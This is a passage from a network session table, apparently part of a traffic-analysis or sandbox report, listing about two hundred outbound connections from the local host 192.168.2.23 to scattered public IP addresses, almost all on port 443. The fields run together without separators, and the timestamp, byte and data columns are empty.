                                                19476192.168.2.234683475.20.210.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19477192.168.2.234785647.18.47.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19478192.168.2.2360608142.18.230.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19479192.168.2.235177045.82.68.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19480192.168.2.233698890.214.175.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19481192.168.2.2336296219.221.178.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19482192.168.2.235964482.109.241.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19483192.168.2.234006447.44.159.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19484192.168.2.234908831.100.176.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19485192.168.2.2351298156.217.218.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19486192.168.2.2338120131.235.213.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19487192.168.2.233680082.142.158.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19488192.168.2.235929470.10.101.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19489192.168.2.233325085.142.39.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19490192.168.2.2354576197.162.149.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19491192.168.2.2337142107.17.43.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19492192.168.2.234912465.27.69.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19493192.168.2.234884274.233.125.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19494192.168.2.234890645.165.138.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19495192.168.2.2356340223.137.54.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19496192.168.2.2336706185.139.158.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19497192.168.2.2344162203.154.81.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19498192.168.2.233598857.55.201.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19499192.168.2.2352984132.44.184.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19500192.168.2.23549828.211.78.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19501192.168.2.2348098141.121.38.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19502192.168.2.2359848160.241.48.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19503192.168.2.2354496209.64.141.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19504192.168.2.234840447.27.22.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19505192.168.2.2348798131.117.116.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19506192.168.2.235930653.36.139.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19507192.168.2.233530080.223.126.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19508192.168.2.2338314145.43.169.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19509192.168.2.2359026114.99.45.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19510192.168.2.2355318154.129.20.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19511192.168.2.2355894125.199.238.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19512192.168.2.2341018142.246.211.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19513192.168.2.234719445.116.79.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19514192.168.2.234027671.209.194.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19515192.168.2.2334384150.94.230.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19516192.168.2.2339458188.126.184.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19517192.168.2.2339118153.146.250.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19518192.168.2.2351218105.10.250.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19519192.168.2.2355882196.253.189.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19520192.168.2.2354032210.169.197.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19521192.168.2.234852098.11.19.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19522192.168.2.2350974200.157.176.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19523192.168.2.2337224182.132.181.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19524192.168.2.233493238.37.3.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19525192.168.2.235902054.189.228.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19526192.168.2.2359478139.28.39.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19527192.168.2.2354966200.116.214.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19528192.168.2.2345902117.206.165.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19529192.168.2.2353982119.228.61.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19530192.168.2.2356092199.50.7.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19531192.168.2.2357248104.94.144.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19532192.168.2.2343142222.104.195.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19533192.168.2.2349856160.208.254.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19534192.168.2.235056052.119.223.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19535192.168.2.235502863.84.209.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19536192.168.2.235293814.83.245.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19537192.168.2.23567928.105.104.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19538192.168.2.2350408144.201.179.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19539192.168.2.235572485.246.228.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19540192.168.2.2345446126.83.236.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19541192.168.2.235168092.149.33.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19542192.168.2.235414037.77.249.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19543192.168.2.2347076103.249.205.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19544192.168.2.2352716134.195.198.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19545192.168.2.2353906181.12.206.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19546192.168.2.2337148110.33.167.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19547192.168.2.2342660175.176.151.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19548192.168.2.2333368131.248.36.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19549192.168.2.2348992182.95.153.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19550192.168.2.2335104120.203.252.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19551192.168.2.2339514167.110.78.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19552192.168.2.234105012.203.184.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19553192.168.2.2348642193.121.117.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19554192.168.2.2347152164.23.208.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19555192.168.2.233580452.147.195.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19556192.168.2.2359128198.12.105.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19557192.168.2.2345908223.137.213.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19558192.168.2.2346394169.166.17.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19559192.168.2.2356950144.113.24.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19560192.168.2.2334508216.31.150.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19561192.168.2.2347854198.60.140.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19562192.168.2.2354674129.175.105.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19563192.168.2.236038699.189.205.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19564192.168.2.2354598129.127.200.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19565192.168.2.2335322146.136.89.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19566192.168.2.2352088168.108.192.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19567192.168.2.235384665.164.175.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19568192.168.2.233649420.252.131.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19569192.168.2.2350756115.96.96.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19570192.168.2.2333746185.65.231.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19571192.168.2.235386670.55.157.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19572192.168.2.2347486201.21.137.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19573192.168.2.234660241.165.115.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19574192.168.2.235957837.64.63.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19575192.168.2.2338448109.201.213.1418080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19576192.168.2.235058688.171.112.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19577192.168.2.2349114216.93.16.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19578192.168.2.2354292156.239.52.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19579192.168.2.2338858134.126.231.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19580192.168.2.235868058.205.8.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19581192.168.2.2349734163.119.7.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19582192.168.2.2344680174.206.44.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19583192.168.2.234904652.132.205.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19584192.168.2.233425842.183.51.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19585192.168.2.235226648.205.184.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19586192.168.2.2351448117.96.160.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19587192.168.2.2334684162.175.237.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19588192.168.2.235284857.211.185.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19589192.168.2.2339488157.28.50.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19590192.168.2.234596418.114.92.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19591192.168.2.234653091.12.122.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19592192.168.2.2358366191.152.81.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19593192.168.2.233277289.149.246.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19594192.168.2.2354970151.156.50.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19595192.168.2.234969447.227.122.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19596192.168.2.2338504168.3.1.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19597192.168.2.235469069.23.124.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19598192.168.2.2359502184.17.249.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19599192.168.2.2359048130.83.5.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19600192.168.2.2334772126.192.112.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19601192.168.2.235126673.66.79.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19602192.168.2.235782812.154.82.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19603192.168.2.2346456201.1.53.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19604192.168.2.235220858.6.26.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19605192.168.2.234229425.172.246.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19606192.168.2.2357992130.132.109.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19607192.168.2.2357502141.67.18.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19608192.168.2.234331069.176.141.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19609192.168.2.2359092146.156.125.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19610192.168.2.2334524165.238.23.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19611192.168.2.2342422123.255.22.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19612192.168.2.2341346204.58.166.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19613192.168.2.2352524171.127.162.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19614192.168.2.2343226169.128.253.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19615192.168.2.234878268.106.100.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19616192.168.2.2341766172.83.24.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19617192.168.2.233905889.34.234.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19618192.168.2.2337752134.168.213.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19619192.168.2.2358854103.131.39.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19620192.168.2.234209434.253.171.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19621192.168.2.23442289.250.217.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19622192.168.2.2340532141.112.157.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19623192.168.2.2335108185.240.156.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19624192.168.2.233633045.152.85.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19625192.168.2.2334854216.245.166.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19626192.168.2.2351396158.48.205.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19627192.168.2.235717646.141.87.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19628192.168.2.233314454.218.212.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19629192.168.2.233624274.66.89.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19630192.168.2.234387096.109.55.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19631192.168.2.2336544102.14.114.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19632192.168.2.2340262134.220.133.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19633192.168.2.2343050201.78.77.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19634192.168.2.2347144101.36.133.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19635192.168.2.235871049.199.229.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19636192.168.2.2342874171.138.228.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19637192.168.2.2353474209.168.224.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19638192.168.2.235318427.116.2.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19639192.168.2.2347640149.184.122.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19640192.168.2.235119881.89.27.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19641192.168.2.2359672137.109.82.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19642192.168.2.236073814.50.199.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19643192.168.2.2339428135.201.67.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19644192.168.2.2350542170.186.36.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19645192.168.2.2338268182.170.142.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19646192.168.2.2349456196.235.195.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19647192.168.2.2349226115.75.71.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19648192.168.2.2355478175.252.180.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19649192.168.2.2354422182.121.71.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19650192.168.2.233963639.217.4.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19651192.168.2.2347430112.61.44.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19652192.168.2.234286658.2.21.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19653192.168.2.235537074.86.244.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19654192.168.2.235822442.228.233.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19655192.168.2.235552464.103.111.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19656192.168.2.234681031.86.61.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19657192.168.2.2356330221.49.213.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19658192.168.2.2340294112.45.234.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19659192.168.2.235580661.210.60.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19660192.168.2.235285690.98.102.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19661192.168.2.2353096181.68.95.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19662192.168.2.2341820111.249.76.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19663192.168.2.233760471.239.7.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19664192.168.2.2338406216.194.32.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19665192.168.2.2352136136.104.212.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19666192.168.2.234630687.92.144.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19667192.168.2.235768685.134.187.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19668192.168.2.2335538187.138.122.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19669192.168.2.2342624217.80.232.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19670192.168.2.2347228130.228.17.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19671192.168.2.2357746161.174.27.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19672192.168.2.234353892.48.106.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19673192.168.2.2357632213.136.210.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19674192.168.2.2353500169.96.222.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19675192.168.2.2356684116.242.252.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19676192.168.2.2350814110.94.217.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19677192.168.2.2341076217.86.6.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19678192.168.2.2333920104.58.103.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19679192.168.2.235822663.41.137.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19680192.168.2.2359968137.163.249.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19681192.168.2.233823095.160.163.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19682192.168.2.2349152119.104.34.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19683192.168.2.2339798219.61.231.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19684192.168.2.233724096.215.52.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19685192.168.2.2345080207.38.46.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19686192.168.2.233480423.176.31.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19687192.168.2.2352536165.106.103.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19688192.168.2.2352194195.8.216.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19689192.168.2.233809081.26.213.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19690192.168.2.234867471.94.208.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19691192.168.2.23456061.186.93.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19692192.168.2.233376470.65.1.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19693192.168.2.2360222211.55.159.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19694192.168.2.2333782139.99.144.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19695192.168.2.2352480134.69.115.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19696192.168.2.2343146151.229.53.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19697192.168.2.2338046112.85.227.126443
                                                TimestampBytes transferredDirectionData


